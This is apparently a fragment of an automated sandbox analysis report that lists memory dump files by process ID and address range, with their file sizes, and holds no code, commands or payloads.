                                                                                                  • memory/5628-423-0x0000000005630000-0x0000000005769000-memory.dmp

                                                                                                    Filesize

                                                                                                    1.2MB

                                                                                                  • memory/5628-399-0x0000000000AB0000-0x0000000000DEC000-memory.dmp

                                                                                                    Filesize

                                                                                                    3.2MB

                                                                                                  • memory/5628-421-0x0000000005630000-0x0000000005769000-memory.dmp

                                                                                                    Filesize

                                                                                                    1.2MB

                                                                                                  • memory/5628-418-0x0000000005630000-0x0000000005769000-memory.dmp

                                                                                                    Filesize

                                                                                                    1.2MB

                                                                                                  • memory/5628-1827-0x0000000005B50000-0x0000000005BE6000-memory.dmp

                                                                                                    Filesize

                                                                                                    600KB

                                                                                                  • memory/5628-1828-0x0000000005BF0000-0x0000000005C3C000-memory.dmp

                                                                                                    Filesize

                                                                                                    304KB

                                                                                                  • memory/6508-1834-0x0000000005B60000-0x0000000005CE2000-memory.dmp

                                                                                                    Filesize

                                                                                                    1.5MB

                                                                                                  • memory/6508-1821-0x0000000000E30000-0x00000000011B0000-memory.dmp

                                                                                                    Filesize

                                                                                                    3.5MB

                                                                                                  • memory/7356-1838-0x0000000005730000-0x0000000005956000-memory.dmp

                                                                                                    Filesize

                                                                                                    2.1MB

                                                                                                  • memory/7604-1831-0x0000000000FD0000-0x000000000126E000-memory.dmp

                                                                                                    Filesize

                                                                                                    2.6MB